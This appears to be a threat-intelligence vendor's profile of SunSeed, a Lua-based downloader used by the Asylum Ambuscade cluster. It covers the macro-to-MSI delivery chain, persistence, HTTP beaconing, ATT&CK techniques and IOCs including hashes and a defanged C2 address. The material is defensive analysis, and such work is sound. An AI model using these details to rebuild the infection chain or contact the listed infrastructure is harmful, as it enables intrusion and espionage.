SunSeed
SunSeed is a Lua-based downloader used in campaigns tracked by Proofpoint, notably the Asylum Ambuscade cluster. It has been delivered via spearphishing emails with malicious Excel attachments containing VBA macros that invoke Windows Installer to silently download and install an MSI package. In the February 2022 campaign reported by Proofpoint, the MSI installed legitimate Lua dependencies, a Windows Lua interpreter, and a malicious Lua script named print.lua under C:\ProgramData.security-soft, and established persistence via a Startup shortcut named "Software Protection Service.lnk". The modified Lua interpreter sppsvc.exe was configured to suppress console output. SunSeed collects the victim host's C: drive partition serial number and sends repeated HTTP GET beacons over port 80, typically every three seconds, appending that serial number to the request path and using the User-Agent "LuaSocket 2.0.2". Its purpose is to retrieve additional Lua code from actor-controlled infrastructure; reported follow-on scripts included an "install" script that downloads AHKBOT and a legitimate AutoHotkey interpreter, and a "move" script used to reassign victim management to another C2 server. Proofpoint also reported SunSeed equivalents implemented in Tcl and VBS. SunSeed was observed targeting European government personnel involved in refugee logistics related to Ukraine, and later reporting tied its use to broader Asylum Ambuscade espionage and crimeware activity against government entities in Europe and Central Asia, as well as other victim classes. Proofpoint noted functional similarity between SunSeed and the VBS downloader WasabiSeed from the Screentime/TA866 cluster. High-confidence IOCs directly mentioned include MSI qwerty_setup.msi (SHA-256 31d765deae26fb5cb506635754c700c57f9bd0fc643a622dc0911c42bf93d18f), SunSeed print.lua (SHA-256 7bf33b494c70bd0a0a865b5fbcee0c58fa9274b8741b03695b45998bcd459328), and staging/C2 infrastructure including 84.32.188[.]96.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The email included a malicious macro attachment which attempted to download a Lua-based malware dubbed SunSeed.
The email included a malicious macro attachment which attempted to download a Lua-based malware dubbed SunSeed.
Techniques & procedures
10 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques“Proofpoint has identified a likely nation-state sponsored phishing campaign… The email included a malicious macro attachment…”; “sent to a European government entity… included a macro enabled XLS file…”
“campaign… using a possibly compromised Ukrainian armed service member’s email account to target European government personnel…”
Execution
2 techniques“When enabled, it executes a VB macro named ‘Module1’… invoking Windows Installer to call out… and download a malicious MSI package.”
“installed… a Windows Lua interpreter… executed a malicious Lua script… dubbed SunSeed… consistently pings the C2 server for additional Lua code, and executes the code upon receiving it…”
Persistence
1 techniquePrivilege Escalation
1 techniqueStealth
2 techniques“creates a Windows Installer (msiexec.exe) object… call out to an actor-controlled staging IP and download a malicious MSI package… ‘completely silent installation.’”
“UILevel… ‘completely silent installation.’ This hides all macro actions… Notably… interpreter… modified so it does not print any output… conceal the malware installation…”
Discovery
1 technique“obtains the C Drive partition serial number from the host, appends to a URL request…”
Command and Control
2 techniques“issues GET requests over HTTP via port 80 using a Lua Socket… every three seconds… user agent ‘LuaSocket 2.0.2’… to http://84.32.188[.]96/”
“download a malicious MSI package… obtain an MSI install file from a URL, save it to a cached location, and finally begin installation…”
IOCs tracked for this family
25 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Lua-based looping downloader (not directly observed in the TA866 campaigns in this report) described as functionally similar to WasabiSeed: repeatedly downloads payloads in a loop and uses the C: drive serial as part of the URL path.
Lua-based downloader delivered via macro-enabled Excel attachment that uses Windows Installer (msiexec/InstallProduct) to fetch an MSI, installs Lua runtime/dependencies, establishes persistence via a Startup LNK, and repeatedly beacons over HTTP (LuaSocket UA) to retrieve and execute additional Lua code; appends the host C: volume serial number to C2 requests for victim tracking/selection.
Script-based first-stage downloader (Lua/Tcl/VBS variants) that contacts a C2 over HTTP, retrieves and executes additional code (Lua variants), and can download/install the next stage (e.g., AHKBOT via AutoHotkey interpreter).
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.